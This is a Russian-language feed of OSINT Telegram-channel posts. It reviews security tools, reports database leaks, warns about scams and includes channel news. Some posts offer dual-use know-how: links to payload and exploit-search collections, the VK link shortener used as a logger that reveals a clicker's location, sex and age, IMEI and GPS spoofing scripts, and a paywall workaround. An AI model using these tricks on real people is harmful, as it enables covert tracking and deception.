Платформа проверяет элементы, используя более 70 антивирусных (AV) сканеров и сервисов блокировки URL/доменов, обеспечивая комплексное обнаружение угроз. Анализ VirusTotal включает эвристические движки, обнаружения на основе сигнатур и извлечение метаданных, предлагая глубокое понимание природы сканируемого контента. Помимо основных результатов сканирования AV, VirusTotal предоставляет богатые контекстные данные, такие как хэши файлов, размер файла, временные метки создания и изменения, а также поведенческий анализ. Для доменов и IP-адресов VirusTotal включает информацию WHOIS, пассивные данные DNS и сведения о сертификатах SSL. Платформа также идентифицирует вредоносные сигналы, такие как подозрительные строки, встроенные URL-адреса или ссылки на известных злоумышленников.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #WEB #SITE

Интернет-Розыск I OSINT I Киберрасследования

02 Jan, 10:05


Advanced video search - расширенный видеопоиск Google.
Это удобный инструмент для нахождения нужных видеороликов на конкретных платформах (YouTube, TikTok и др.).
Он позволяет искать по ключевым словам в названии, описании и даже комментариям, а также фильтровать результаты по сайтам, датам, длительности и другим параметрам.

https://www.google.com/advanced_video_search

👉 Подписывайтесь на OSINT Беларусь

Интернет-Розыск I OSINT I Киберрасследования

02 Jan, 07:03


🔤 AlienVault Open Threat Exchange (OTX) — это совместная платформа для анализа угроз, которая позволяет аналитикам безопасности получать доступ, обмениваться и обогащать данные о возникающих киберугрозах.

➡️https://otx.alienvault.com/

Благодаря вкладу мирового сообщества исследователей и специалистов по безопасности OTX предоставляет актуальные индикаторы компрометации (IOC), такие как вредоносные IP-адреса, домены, URL-адреса и хэши файлов. Платформа также предлагает подробные отчеты об угрозах и импульсные каналы, которые объединяют данные об угрозах в действенные идеи, которые можно напрямую интегрировать в рабочие процессы безопасности. Для аналитиков безопасности OTX бесценен в обнаружении и смягчении угроз. Его интерактивный интерфейс позволяет пользователям искать конкретные угрозы или подписываться на «импульсы» — коллекции IOC, привязанные к определенным кампаниям или субъектам угроз.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #SAFETY #CYBER

Интернет-Розыск I OSINT I Киберрасследования

01 Jan, 14:03


🔤 Any Run — это интерактивная платформа анализа вредоносных программ, которая позволяет аналитикам безопасности безопасно выполнять и проверять подозрительные файлы, URL-адреса или процессы в контролируемой облачной среде.

➡️https://app.any.run/

В отличие от традиционных инструментов-песочниц, Any Run обеспечивает высокоинтерактивный опыт, позволяя пользователям взаимодействовать с вредоносными программами в режиме реального времени, например, нажимать на ссылки, открывать файлы или имитировать действия пользователя. Эта интерактивность помогает аналитикам обнаруживать поведение, которое может оставаться скрытым в автоматизированных средах анализа. Any Run полезен для анализа образцов вредоносного ПО, фишинговых документов или вредоносных URL-адресов и предоставляет сопоставление MITRE ATT&CK, подробную информацию о сетевой активности, изменениях файловой системы и выполнении процессов, а также визуализацию сетевых подключений и подробную временную шкалу событий.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #SAFETY #CODE

Интернет-Розыск I OSINT I Киберрасследования

01 Jan, 11:03


🔤 linkedin-profile-viewer - позволяет просматривать данные пользовательских профилей в социальной сети LinkedIn (заблокирована на территории РФ).

➡️https://nubela.co/proxycurl/demo/linkedin-profile-viewer

Показывает фотографию профиля и описание полностью + некоторую информацию об опыте и образовании. Полезно для тех, у кого нет учетной записи Linkedin.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #SOCMINT #LINKEDIN

Интернет-Розыск I OSINT I Киберрасследования

01 Jan, 08:16


🔤 Ghidra — это фреймворк обратной разработки с открытым исходным кодом, разработанный Агентством национальной безопасности (АНБ), предлагающий мощный набор инструментов для анализа скомпилированного кода.

➡️https://ghidra-sre.org/

Он поддерживает широкий спектр архитектур и форматов файлов, что делает его универсальным ресурсом для аналитиков безопасности, исследующих вредоносные программы или другие исполняемые файлы. Благодаря таким функциям, как декомпиляция, дизассемблирование и анализ потока данных, Ghidra помогает аналитикам понять поведение и функциональность двоичных файлов, не требуя доступа к их исходному коду. Для аналитиков безопасности Ghidra особенно ценна в анализе вредоносного ПО, поскольку она позволяет идентифицировать вредоносные функции, встроенные строки и другие подозрительные поведения в исполняемых файлах. Удобный интерфейс инструмента и возможности создания скриптов позволяют аналитикам автоматизировать повторяющиеся задачи и выполнять глубокий анализ более эффективно.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #CODE #SAFETY

Интернет-Розыск I OSINT I Киберрасследования

31 Dec, 23:55


Новый снежный год утечек БД начался с не менее снежного спортивного комплекса и интернет-магазина спортивной экипировки «КАНТ».
Хакеры утверждают, что в открытый доступ попали данные более 300 тысяч пользователей и их заказов.

Актуальность - 24.12.2024

Состав
▪️Имя
▪️Почта
▪️Телефон

#утечка

Интернет-Розыск I OSINT I Киберрасследования

31 Dec, 20:47


☃️🎄От всей души поздравляю всех с наступающим Новым годом! Пусть этот волшебный праздник принесёт вам радость, тепло и уют в дом. Желаю, чтобы в новом году сбылись все ваши заветные мечты, а каждый день был наполнен счастьем и гармонией. Пусть здоровье крепнет, успехи сопровождают все начинания, а любовь и дружба окружают вас повсюду. С Новым годом! Пусть он будет добрым, светлым и полным позитивных изменений!

Интернет-Розыск I OSINT I Киберрасследования

31 Dec, 13:24


🎁 ТГ— ПРЕМИУМ В ПОДАРОК 🎁

Скамеры в праздники не отдыхают. Они рассылают предложения о подарке премиум-статуса в Телеграме. С предложением идет ссылка, при переходе по которой пользователь вводит код и у него угоняют телеграм- аккаунт. Будьте осторожны!

🇷🇺Подпишись на Ленинградский cyber - страж
Предупрежден- вооружен !

Интернет-Розыск I OSINT I Киберрасследования

31 Dec, 13:01


🔤 PhishTank — это платформа, управляемая сообществом, которая предоставляет централизованный репозиторий известных фишинговых URL-адресов, позволяя аналитикам безопасности проверять и сообщать о подозрительных ссылках.

➡️https://phishtank.org/

Отправляя URL-адрес в PhishTank, аналитики могут быстро определить, признан ли он уже вредоносным или связанным с фишингом. Платформа также позволяет пользователям вносить вклад в более широкое сообщество безопасности, сообщая о новых фишинговых ссылках, которые проверяются и проверяются перед добавлением в базу данных. Для аналитиков безопасности PhishTank служит ценным ресурсом для выявления и проверки угроз фишинга. При расследовании подозрительных писем или веб-сайтов аналитики могут сопоставлять ссылки с базой данных PhishTank, чтобы подтвердить их легитимность. Платформа также предоставляет контекстные данные о сообщенных URL-адресах, такие как дата их отправки и текущий статус проверки. Используя этот инструмент, аналитики могут улучшить свои расследования фишинга и внести свой вклад в текущие усилия по борьбе с фишинговыми кампаниями во всем мире.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #LINK #SAFETY

Интернет-Розыск I OSINT I Киберрасследования

31 Dec, 10:00


🔤 htmlviewer позволяет просматривать HTML-код веб-страницы. Для нас это открывает возможность читать статьи не тех сайтах, которые требуют обязательную регистрацию и/или оплату (крупные СМИ, социальные сети и т.п.)

➡️https://codebeautify.org/htmlviewer#

Заходите на подобный сайт, жмете "Ctrl+U" или "Посмотреть код страницы". После чего копируете себе весь код и вставляете его в сервис.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #HTML #CODE

Интернет-Розыск I OSINT I Киберрасследования

31 Dec, 08:11


Изменения коснулись ч. 2 ст. 150 и ч. 2 ст. 151 УК РФ. Теперь за вовлечение подростков в совершение преступления можно будет отправиться в колонию на срок от 3 до 6 лет. Вовлечение в совершение антиобщественных действий правосудие может оценить максимум на пять лет лишения свободы.

Интернет-Розыск I OSINT I Киберрасследования

26 Dec, 12:00


#НастольнаяКНИГА Сценарии будущего. Как жить и работать в мире, захваченном нейросетью и роботами.

Сегодня на человека в гораздо меньшей степени влияет природа и гораздо больше – он сам и принятые им решения: по данным некоторых исследований экзистенциальных рисков, вероятность вымирания человечества от антропогенных последствий в сотни раз выше, чем от природных. Выборы, которые мы сделаем, приведут нас или к угасанию и закату, или к полному раскрытию человеческого потенциала, или даже к выходу за его пределы, к трансцендентности, когда человек трансформируется во что-то невообразимо большее.

Ист.: https://futurescenarios.ru

P.S. Отличный выбор для подарка на Новый год!

Интернет-Розыск I OSINT I Киберрасследования

26 Dec, 07:10


☃️🎄 Традиционно, подвожу личные итоги уходящего года...

ОБЩЕСТВЕННАЯ ДЕЯТЕЛЬНОСТЬ:
Был назначен помощником сенатора Российской Федерации В.Н. Киселева. Получил предложение войти в состав Национального фонда искусственного интеллекта. Снялся в нескольких документальных фильмах, таких как "Мятежевойна" и "Засекреченный списки: 5 тайных методов". А еще стал одним из героев книги "Whats next Профессии будущего. Путеводитель по профессиям будущего". Telegram-канал "Интернет-Розыск" перевалил за 52 тыс. подписчиков. Спасибо вам за вовлеченность.

НАУЧНАЯ ДЕЯТЕЛЬНОСТЬ:
Увидела свет моя научная работа "Методы программных комплексов мониторинга деструктивного контента сети Интернет: методические рекомендации", изданная Московской Академией СК России. Планируем к выпуску научную работу, посвященную сбору и анализу данных с устройств задерживаемых лиц (киберкриминалистике). Продолжаю обучать сотрудников правоохранительных органов методам и приемам проведения расследований по открытым данным. Запланировал написать нормальную книгу про OSINT.

НАГРАДЫ:
Получил юбилейный знак "35 лет ОМОН "Бастион" ГУ Росгвардии по г. Санкт-Петербургу и Ленинградской области". Благодарности получил от МТУСИ, ГУНК МВД России, УНК УМВД России по Мурманской области и Общественной палаты Санкт-Петербурга. Приятно. Также пришел и мой лацканный значок участника команды "Цифрового Спецназа" - сообщества лидеров цифровой трансформации в системе государственного управления нашей страны.

Всех с наступающим Новым годом и Рождеством!

Интернет-Розыск I OSINT I Киберрасследования

26 Dec, 05:43


https://reader.rbc.ru/share/fa6gw9dX1FkW56QH7

Интернет-Розыск I OSINT I Киберрасследования

25 Dec, 17:01


Подборка бесплатных курсов и лекций по OSINT:

➡️https://training.dfirdiva.com/listing-category/osint

❗️ Читателям Ромачёва не рекомендуем их посещать. Такие серьезные кадры наверняка быстро вычислят и завербуют иностранные разведки.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #STUDY #TRAINING

Интернет-Розыск I OSINT I Киберрасследования

25 Dec, 15:11


После пяти лет переговоров 193 государства-члена ООН приняли историческую юридически обязывающую Конвенцию по киберпреступности – первую в своем роде. Новая Конвенция требует от государств разработать меры по снижению рисков и угроз киберпреступности. Это включает в себя обучение для государственных и частных секторов, программы реабилитации правонарушителей, помощь жертвам и многое другое.

Почему эта Конвенция важна для людей во всем мире:
1⃣ Новый инструмент для борьбы с растущей угрозой
2⃣ Сотрудничество и обмен данными
3⃣ Защита детей
4⃣ Помощь пострадавшим
5⃣ Улучшение профилактики

Интернет-Розыск I OSINT I Киберрасследования

25 Dec, 14:40


🐾Интересными возможностями для логирования обладает сокращатель гиперссылок от VK. Во-первых, достаточно хорошо определяет локацию местоположения пользователя по IP-адресу. Во-вторых, выдает сведения о его поле и возрасте. Разумеется, данные эти он берет из его профиля в самой VK. Для получения данных достаточно даже того, что профиль просто авторизован в браузере.

➡️https://vk.com/cc

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #VK #LOGGER

Интернет-Розыск I OSINT I Киберрасследования

25 Dec, 13:30


ЦБ намерен внедрить единую систему выявления "дропов" — граждан, через карты которых проходят сомнительные операции. Цель ЦБ (декларируемая) — останавливать таких клиентов на стадии "входа в банк", но при этом "не создать проблем" для граждан... Вангую, что после внедрения системы посыпятся обнальные схемы, т.к. оперативники сразу будут брать в оборот дропа, приходит с ним в банки и снимать деньги, которые ходят по картам. Итог: стоимость обнала вырастет.

Интернет-Розыск I OSINT I Киберрасследования

25 Dec, 12:02


Иностранные спецслужбы активизировали работу по вербовке россиян для подготовки и совершения диверсий через сайты и Telegram-боты для знакомств. Одна из популярных легенд - получение страховых выплат за утраченное имущество.

ПОВТОРЯЕМ:
1⃣Быть диверсантом "круто" только в кино! В реальности никто "с Запада" пальцем о палец не ударит, чтобы вас спасать, вывозить из страны, нанимать адвокатов и т.п.
2⃣Никто не будет платить за диверсию. Вербовщики просто спишут и распилят между собой деньги иностранных кураторов
3⃣Горе-диверсантов находят всегда! Наказание за их действия крайне суровое.

Интернет-Розыск I OSINT I Киберрасследования

25 Dec, 09:43


Минцифры разрабатывает сервис для сбора обезличенных геотреков абонентов от операторов связи на платформе "Гостех". Впрочем, аналитики бигдаты понимают истинное значение слова "обезличенные", как "нужно сделать дополнительную операцию для получения этих самых данных". Проходили на примере истории с ADINT и "обезличенными" идентификаторами поисковых машин.

Интернет-Розыск I OSINT I Киберрасследования

25 Dec, 07:54


База данных интернет-магазина модной сети обуви и аксессуаров для женщин Ekonika стала общедоступной.
Хакеры утверждают, что пострадали 800 тысяч пользователей и 400 тысяч заказов.
По информации из ЕГРЮЛ, уставный капитал компании составляет 150 миллионов рублей, а выручка в 2023 году превысила 13 миллиардов.

Актуальность - 19.12.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон
▪️Адрес доставки

#утечка #ekonika

Интернет-Розыск I OSINT I Киберрасследования

25 Dec, 07:10


❗️Внимание! Доменное имя irozysk.ru выбыло из пользования командой проекта, как и ряд других технических доменов. С 19.11.2024 года они используются третьими лицами.

Интернет-Розыск I OSINT I Киберрасследования

24 Dec, 21:36


#news Недавно всплывали подробности операции с Anom от ФБР, а процесс над дистрибьюторами всё идёт. И обзавёлся интересным поворотом: защита требует раскрыть имя информатора. Он же создатель Anom, передавший контроль над платформой безопасникам в погонах, которые организовали на её основе увлекательный стартап.

При этом гособвинение обязано раскрыть его личность, если дело пойдёт в суд. Так что с подачи адвокатов Александра Дмитриенко и прочей обслуги федералов поневоле ключевой персонаж в любимой операции ФБР в его новейшей истории рискует быть раскрытым. Перед картелями и другими замечательными людьми, желающими выразить ему благодарность за впечатляющих масштабов ханипот. Так что вопрос приватности для товарища Afgoo в сущности становится вопросом жизни и смерти. Понятно, что его упрячут подальше по программе защиты свидетелей. Но осадочек явно останется.

@tomhunter

Интернет-Розыск I OSINT I Киберрасследования

24 Dec, 14:15


В конце года принято подводить итоги о количестве утечек попавших в открытый доступ.
Не все утечки за этот год мы учли (например 404), но они не сильно влияют на общую картину.
В других аналогичных каналах цифры, конечно, будут другие, но как обычно там просто цифры.
Мы же собрали данные о российских утечках, которые показались нам интересными и были упомянуты в нашем канале.

По итогу
▪️Количество баз - 205
▪️Количество строк - 392 227 370

#утечки

Интернет-Розыск I OSINT I Киберрасследования

23 Dec, 17:02


🐾 Презентации с конференции Black Hat Europe 2024

➡️https://github.com/onhexgroup/Conferences/tree/main/BlackHat_Europe_2024_slides

Интернет-Розыск I OSINT I Киберрасследования

23 Dec, 15:02


🔤 They see your photos - инструмент описания содержимого на фотографии.

➡️https://theyseeyourphotos.com/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #PHOTO #GEOINT

Интернет-Розыск I OSINT I Киберрасследования

23 Dec, 14:18


Велика вероятность блокировки в России WhatsApp. Впрочем, учитывая использование данных мессенджера в различных программах слежения (ECHO, Lavander, Locomotive и др.), решение полностью оправданное.

Интернет-Розыск I OSINT I Киберрасследования

23 Dec, 12:00


СБУ активно привлекает колл-центры, большинство из которых расположены в Днепропетровске, к организации провокаций на территории России, вербуя агентов. Так, за последние пару суток по России прокатилась серия поджогов по заказу украинских спецслужб.

❗️Все жертвы украинских мошенников оперативно задержаны, их действия могут быть квалифицированы по ст. 205 УК РФ «Террористический акт», санкция которой предусматривает до 20 лет лишения свободы.

Интернет-Розыск I OSINT I Киберрасследования

03 Dec, 16:21


😂 Вот и нашлась работа OSINTерам после введения уголовной ответственности за незаконную обработку персональных данных. На договорных началах могут GeoINTить в свое удовольствие места производства нелегальной алкашки.

С 3 декабря в РФ контролирующие органы для выявления недобросовестных производителей контрафактного алкоголя смогут применять данные из космоса. С помощью дистанционного зондирования Земли можно будет отследить колебания уровня выброса теплового излучения от здания, наличие дыма, а также передвижение железнодорожного и грузового транспорта рядом со зданиями.

Интернет-Розыск I OSINT I Киберрасследования

03 Dec, 15:02


📓 Список полезных нагрузок и обходных путей для безопасности веб-приложений и пентеста/CTF

➡️https://github.com/swisskyrepo/PayloadsAllTheThings
➡️https://swisskyrepo.github.io/PayloadsAllTheThings/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #HACK #SECURITY

Интернет-Розыск I OSINT I Киберрасследования

03 Dec, 12:01


Вот такая вот особенность часов Garmin. Штатно, из коробки, они показывают смс коды, не считывая заблокированный экран ( в отличии от Apple Watch) .
Поэтому авторизация в сервисах не составит труда ( при отсутствии облачного пароля)
Garmin, ну ты чё?

Да, вы справедливо заметите, что можно отключить эту функцию в настройках. Но политика безопасности должна предусматривать такие моменты и заботиться о клиентах, особенно учитывая, что гармин носят зачастую не самые простые люди:)

А так безусловно, счастливые часов не наблюдают (на руках)

Интернет-Розыск I OSINT I Киберрасследования

03 Dec, 10:00


🫡В СК России состоялось совещание по вопросам цифровой трансформации. В т.ч., участники мероприятия обсудили и перспективы создания автоматизированной информационно-аналитической системы СК 😉👍 которая позволит значительно оптимизировать рабочие процессы, а также улучшить межведомственное взаимодействие.

Интернет-Розыск I OSINT I Киберрасследования

03 Dec, 09:01


🐾🔍 Если мы хотим собирать данные с конечных точек (агентов) на ОС Windows, то существует три основных инструмента. Первым является подсистема аудита Windows, хранящая события в формате EventLog. События в нем делятся на несколько групп – журналов. Однако для первичной аналитики, а тем более расследования инцидентов, информации только с EventLog не всегда бывает достаточно. В связи с этим активно используется другая утилита с расширенными функциями аудита событий – Sysmon, входящий в пакет Sysinternals. По сути, она является системной службой Windows, которая отдает подробные данные о приходящих событиях, сетевых подключениях и драйверах, изменениях файлов и многом другом. Замыкает тройку первостепенных технологий сбора событий средство Event Tracing for Windows (ETW) – трассировка событий Windows. Технология предоставляется в самой ОС по умолчанию и осуществляется на уровне ядра.

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #FORENSIC #WINDOWS

Интернет-Розыск I OSINT I Киберрасследования

03 Dec, 08:38


Пробивочные боты сокращают выдачу информации, облачные СУБД прекращают свою работу... количество OSINTers снижается соразмерно... Так, глядишь, направление снова станет экспертным)))

Интернет-Розыск I OSINT I Киберрасследования

03 Dec, 06:00


🔤 HostHunter – это инструмент разведки для обнаружения имён хостов используя техники OSINT.

➡️https://github.com/SpiderLabs/HostHunter

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #HOST #SECURITY

Интернет-Розыск I OSINT I Киберрасследования

03 Dec, 04:40


😉👍 TeleSINT прикрутил к себе новые возможности:
Поиска автора стикерпака. Отправьте стикер в бот
Поиска автора emoji. Пришлите боту ссылку на набор

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TELEGRAM

Интернет-Розыск I OSINT I Киберрасследования

02 Dec, 21:22


База данных сети оптово-розничных магазинов «Долина цветов» из Ростова-на-Дону была выставлена на продажу в Даркнете.
Хакеры утверждают, что в ней содержится 277 000 записей, и её стоимость составляет всего 230 долларов.
При этом, для компании, такая утечка может привести к штрафу в размере 140 000 долларов, согласно новым поправкам.
А "Согласие на обработку персональных данных" на сайте вообще похоже на клятву верности милорду из игры Warcraft.

Актуальность - 30.11.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон
▪️Адрес доставки
▪️Комментарий к заказу

#утечка

Интернет-Розыск I OSINT I Киберрасследования

02 Dec, 17:02


Код ИБ ИТОГИ
📆 05.12.2024
◾️ Москва, отель Palmira Business Club (ул. Новоданиловская набережная 6, к.2)

Принимаю участие в конференции Код ИБ ИТОГИ. Конец года — это лучшее время, чтобы в кругу профессионалов изучить аналитику, узнать последние тренды ИБ и прогнозы для принятия верных решений.

Интернет-Розыск I OSINT I Киберрасследования

02 Dec, 15:01


🔤 SiCat — это продвинутый инструмент поиска эксплойтов, предназначенный для эффективного выявления и сбора информации об эксплойтах как из открытых источников, так и из локальных репозиториев.

➡️https://github.com/justakazh/sicat

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #SICAT #HACK

Интернет-Розыск I OSINT I Киберрасследования

02 Dec, 11:01


🔤 Gitleaks – SAST-инструмент с открытым исходным кодом. Позволяет сканировать код из Git репозиториев на наличие утечек и конфиденциальной информации.

➡️https://github.com/gitleaks/gitleaks
➡️https://gitleaks.io/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #GIT #LEAKINT

Интернет-Розыск I OSINT I Киберрасследования

02 Dec, 07:01


Инструменты для выявления аудиальных дипфейков, сгенерированных нейросетями

➡️https://zinc.cse.buffalo.edu/ubmdfl/deep-o-meter/landing_page
➡️https://www.duckduckgoose.ai/
➡️https://www.resemble.ai/
➡️https://sensity.ai/
➡️https://aivoicedetector.com/
➡️https://www.aiornot.com/
➡️https://elevenlabs.io/

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #AI #DEEPFAKE

Интернет-Розыск I OSINT I Киберрасследования

24 Nov, 14:00


🐾 Ресурсы для отработки навыков разведки с открытым исходным кодом:

➡️https://tryhackme.com/r/room/ohsint
➡️https://tryhackme.com/r/room/sakura
➡️https://tryhackme.com/r/room/webosint
➡️https://tryhackme.com/r/room/somesint
➡️https://tryhackme.com/r/room/searchlightosint
➡️https://tryhackme.com/r/room/geolocatingimages
➡️https://tryhackme.com/r/room/shodan
➡️https://youtube.com/playlist?list=PLc_hdO4HVYGCg21E7lSQY6UltFigzwbbw&si=JrECV_G4g69GGYs5
➡️https://www.youtube.com/watch?v=4Hkdxnqz1mg&list=PLtoC6Cd29__XR223Kgup_eOD-8EkDQctr
➡️https://www.osintdojo.com/resources/#ctfs
➡️https://www.geoguessr.com/
➡️https://sourcing.games/
➡️https://kasescenarios.com/
➡️https://gralhix.com/list-of-osint-exercises/
➡️https://www.reddit.com/r/geochallenges/
➡️https://www.reddit.com/r/Whatisthis/
➡️https://tracelabs.org/
➡️https://dataqa.ru/osint-igry/
➡️https://hackyourmom.com/en/kibervijna/osint-ctf-challenges/
➡️https://github.com/yaelwrites/Big-Ass-Data-Broker-Opt-Out-Lis
➡️https://inteltechniques.com/workbook.html
➡️https://inteltechniques.com/exposure.html

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #TRANING

Интернет-Розыск I OSINT I Киберрасследования

24 Nov, 11:14


#tools Всем любителям и профессионалам #OSINT напоминаю о том, что нашим отделом расследований сделана собственная версия браузера OPERA для Windows, предназначенная для проведения расследований по открытым источникам информации.

Браузер портативный, т.е. вы можете брать его с собой на флешке. На борту имеется тонна ссылок на полезный софт и онлайн-сервисы. Все разбито по направлениям исследований: Telegram, веб-ресурсы, криптовалюты, электронная почта, телефонные номера и т.п. Отдельная рублика сделана специально для сотрудников служб безопасности.

@tomhunter

Интернет-Розыск I OSINT I Киберрасследования

24 Nov, 09:36


База данных более 28 000 пользователей одного из крупнейших продавцов парфюмерно-косметической продукции в России (как они о себе пишут) — интернет-магазина Parfum-paradise — оказалась в открытом доступе.
Хотя судя по состоянию сайта, его развитием никто не занимается, о чём свидетельствует, например, раздел «О компании» на главной странице, где просто указано общее описание понятия "интернет-магазина", последняя новость от 2018 года, а в группа VK заблокирована, однако проблема возникла из-за использования системы Bitrix.

Актуальность - 25.09.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон

#утечка #bitrix

Интернет-Розыск I OSINT I Киберрасследования

24 Nov, 09:00


🔤 Awesome Vehicle Security - список потрясающих ресурсов, книг, оборудования, программного обеспечения, приложений, людей, за которыми стоит следить, и других интересных вещей о безопасности транспортных средств, взломе автомобилей и настройке функциональности автомобиля.

➡️https://github.com/jaredthecoder/awesome-vehicle-security

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #CAR #HACK

Интернет-Розыск I OSINT I Киберрасследования

23 Nov, 21:13


Компания, заявляющая о защите от взломов всех видов, не смогла обеспечить безопасность данных своих клиентов.
База данных 117 000 пользователей сайта Bastin-S, специализирующегося на дверях и замках, была выставлена на продажу на специализированных сайтах.

Актуальность - 29.10.2024

Состав
▪️ФИО
▪️Почта
▪️Телефон

#утечка #amocrm

Интернет-Розыск I OSINT I Киберрасследования

23 Nov, 21:11


На специализированных ресурсах продаётся база данных компании RAGNAR MACHINERY, предоставляющей услуги аренды специальной техники.
В результате утечки пострадали более 144 000 пользователей, которые могут стать жертвами мошенничества с предоплатой за аренду спецтехники.

Актуальность - 29.10.2024

Состав
▪️ФИО
▪️Телефон

#утечка #amocrm

Интернет-Розыск I OSINT I Киберрасследования

23 Nov, 14:40


Думаю, многие уже знают о новой схеме мошенничества через домовые чаты, где предлагают забрать ненужные мебель или бытовую технику. Однако незадолго до встречи звонит мошенник и предлагает оформить вызов транспортной компании. Конечно же, за свой счёт.
Но для этого нужно установить на телефон специальное приложение «Яндекс Трекинг», которого в природе не существует.
И вот удалось найти живой пример такого фишингового ресурса по адресу DOWNLOAD-APP-ID74261.RU, чтобы вы могли безопасно ознакомиться с шаблоном, понимая, что это точно мошенники.
Судя по названию домена, мошенники только начинают свою деятельность, а этот файл уже давно находится в базах антивирусных программ.
Также следует обратить внимание, что у подобных фейковых маркетплейсов приложений обычно другие ссылки не активны.

#фишинг #яндекс

Интернет-Розыск I OSINT I Киберрасследования

23 Nov, 13:01


⚪️Черная пятница на носу, а значит, нас ждут… Да что вы, какие скидки. Ждут нас сети мошенников, которые стараются заполучить наши денежки, с которыми в «дни больших распродаж» россияне с радостью расстаются. По некоторым оценкам, в сезон распродаж число случаев мошенничества взлетает на 30%. И чем ближе «Черная пятница», которая этом году приходится на 29 ноября, тем выше у любителей онлайн-шопинга риск быть обманутыми - пишет KP.RU.

Всегда проверяйте URL сайта. Он должен совпадать с официальным адресом бренда, - настоятельно рекомендует генеральный директор компании Интернет-Розыск.рф Игорь Бедеров. - Обратите внимание на наличие протокола безопасности (https, а не http) и символ замка в адресной строке. Также рекомендуется изучить регистрационные данные домена сайта в любом из общедоступных сервисов WHOIS (whois.ru, reg.ru/whois, who.is и т. д., - Ред.). Домен надежной организации не может быть зарегистрирован месяц назад, находиться в непонятной юрисдикции и принадлежать анониму. Если предложение кажется слишком хорошим, чтобы быть правдой, вероятнее всего, это мошенничество. Бесплатный сыр бывает только в мышеловках. Также всегда полезно искать отзывы о магазине на независимых платформах.

Проверяйте отправителя и не переходите по подозрительным ссылкам, - говорит Игорь Бедеров. - В крайнем случае, проверяйте такие гиперссылки в антивирусе. Избегать предзаказов на незнакомых ресурсах, особенно если они требуют вводить данные карты. Используйте официальные приложения и сайты для покупок, а также изучайте условия возврата и гарантии.

Защитите свои устройства с помощью антивирусных программ и регулярно обновляйте их, - добавляет правил безопасности Игорь Бедеров. - Настройте двухфакторную аутентификацию и дополнительные облачные пароли защиты для своих учетных записей. Запретите проведение оплат посредством SMS-команд банку и не храните пароли к онлайн-сервисам в своем браузере. Используйте для этого менеджер паролей.

Интернет-Розыск I OSINT I Киберрасследования

23 Nov, 11:46


🔤 Android IMEI Changer - программа для смены IMEI идентификаторов на телефоне под архитектурой ARM

➡️https://github.com/Untouchable17/Android-IMEI-Changer

Добавлен скрипт, позволяющий подменять GPS-координаты устройства.
Добавлен скрипт для изменения ID устройства, который позволяет подменять уникальный идентификатор устройства.
Добавлен скрипт для изменения MAC-адреса устройства, который позволяет подменять уникальный идентификатор сетевого интерфейса.

ℹ️ Альтернативный софт:

➡️https://apkresult.com/en/xposed-imei-changer-pro-apk
➡️https://androidmtk.com/download-mobileuncle-apk
➡️https://play.google.com/store/apps/details?id=com.themonsterit.EngineerStarter

🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ

#⃣ #OSINT #PHONE #IMEI

Интернет-Розыск I OSINT I Киберрасследования

23 Nov, 08:30


А ты уже с нами!!!

Интернет-Розыск I OSINT I Киберрасследования

23 Nov, 08:00


☝️😉👍 А мне лично зашло! Автору - респект!!!

▫️Как проверить контрагента без регистрации и СМС. Часть 1
▫️Как проверить контрагента без регистрации и СМС. Часть 2
▫️Как проверить контрагента без регистрации и СМС. Часть 3
▫️Как проверить контрагента без регистрации и СМС. Часть 4
▫️Как проверить контрагента без регистрации и СМС. Часть 5
▫️Как проверить контрагента без регистрации и СМС. Часть 6

Интернет-Розыск I OSINT I Киберрасследования

22 Nov, 19:07


Тренды науки и технологий 2025 года

👋 Команда поисково-аналитической платформы INVENTORUS подготовила прогноз по трендам, которые будут определять развитие науки и технологий в ближайшие годы.

🔍 По тематикам запросов найдено и проанализировано более 300 тыс. патентов и 600 тыс. публикаций из 45 стран, вышедших за период с 2020 г. по III кв. 2024 г.

Топ направлений в науке и технологиях:

1️⃣Искусственный интеллект 2.0: переход от машинного обучения к полноценным цифровым партнёрам
Инновации: генеративный ИИ, повышение надёжности и этичности технологий, применение для устойчивого развития
Ограничения: высокая зависимость от качества данных, энергозатраты, вопросы конфиденциальности

2️⃣Квантовый рывок: развитие квантовых вычислений для сверхскоростей и точности
Инновации: гибридные квантово-классические архитектуры, нейроморфные системы
Ограничения: сложности масштабирования и надёжности квантовых технологий

3️⃣Биомедицинские прорывы: создание искусственных органов, клеточная инженерия, медицина на заказ
Инновации: новые материалы для 3D-биопечати, эпигенетическое омоложение, бионические конечности
Ограничения: резистентность опухолей, сложности воспроизведения структурных тканей

4️⃣Декарбонизация и зелёные технологии: ближе к углеродной нейтральности: переработка отходов, зелёные технологии в промышленности
Инновации: возобновляемая энергия, биогаз, устойчивое строительство
Ограничения: несовершенство технологий хранения энергии, риски "зеленого камуфляжа"

5️⃣Цифровое общество: баланс между удобством и зависимостью от технологий
Инновации: суперумное общество, персонализированный маркетинг, цифровая грамотность
Ограничения: цифровое неравенство, влияние технологий на психическое здоровье

